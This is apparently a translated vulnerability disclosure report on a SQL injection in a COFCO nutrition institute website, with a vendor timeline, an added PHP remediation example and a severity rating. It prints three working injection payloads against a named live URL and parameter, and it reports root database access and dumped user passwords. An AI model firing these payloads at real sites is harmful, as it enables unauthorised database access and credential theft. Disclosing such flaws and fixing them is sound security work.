2015-08-03: Details reported to the vendor, awaiting vendor handling
2015-08-03: Vendor confirmed the vulnerability; details visible to the vendor only
2015-08-13: Details disclosed to core white hats and domain experts
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public
As stated in the title.
The COFCO Nutrition and Health Research Institute site has a SQL injection vulnerability that runs with root privileges; the database can be dumped to obtain large amounts of sensitive user and password information.
Injection URL: http://c3.cofco.com/online_check.php?uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988
Injection point: the app parameter
Parameter: app (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' AND 9435=9435 AND 'pqLB'='pqLB

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(3794=3794,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'snyA'='snyA

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT * FROM (SELECT(SLEEP(5)))Xddd) AND 'WjQq'='WjQq
The injection executes as the root user with DBA privileges.
Dumped the users' passwords.
Enumerated the databases.
The current database is project_cofco, which contains 181 tables.
Dumped the row count of the qm_user table as verification.
Apply proper filtering.
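The root cause the report describes is the app GET parameter of online_check.php reaching a MySQL query unescaped, on a connection that runs as root. The following is an added example, not the site's own code: it contrasts the assumed vulnerable pattern with a parameterised query, using a hypothetical table and column and a hypothetical low-privilege account.

```php
<?php
// Added example, not the vendor's code. Table name `app_registry`, column
// `name` and the DB user `c3_app` are assumptions for illustration only.

// Assumed vulnerable pattern: the raw GET value is spliced into the SQL text,
// so a closing quote followed by AND/OR, SLEEP() or a CONCAT/FLOOR(RAND())
// error probe (as in the sqlmap output above) rewrites the statement.
function lookupAppVulnerable(PDO $db, string $app): ?array
{
    $sql = "SELECT id, name FROM app_registry WHERE name = '$app'"; // injectable
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: the value is sent to MySQL as a bound parameter, so it is only
// ever compared as data and can never change the query structure.
function lookupAppSafe(PDO $db, string $app): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM app_registry WHERE name = :name');
    $stmt->execute([':name' => $app]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connect as a dedicated account with SELECT only on the tables the page
// needs, never as root: even a residual injection then cannot read qm_user
// or any other database on the server.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=project_cofco;charset=utf8mb4',
    'c3_app',                       // hypothetical low-privilege account
    getenv('C3_DB_PASSWORD') ?: '',
    [
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

// Optional defence in depth: `app` names a module, so reject anything that
// is not a short identifier before it reaches the query at all.
$app = $_GET['app'] ?? '';
if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $app)) {
    http_response_code(400);
    exit('invalid app');
}
var_dump(lookupAppSafe($db, $app));
```

Filtering alone (stripping quotes or keywords) is bypassable in practice; the prepared statement is the fix, and the allowlist check is a second layer.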
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-08-03 18:51
Thank you very much for your support!
None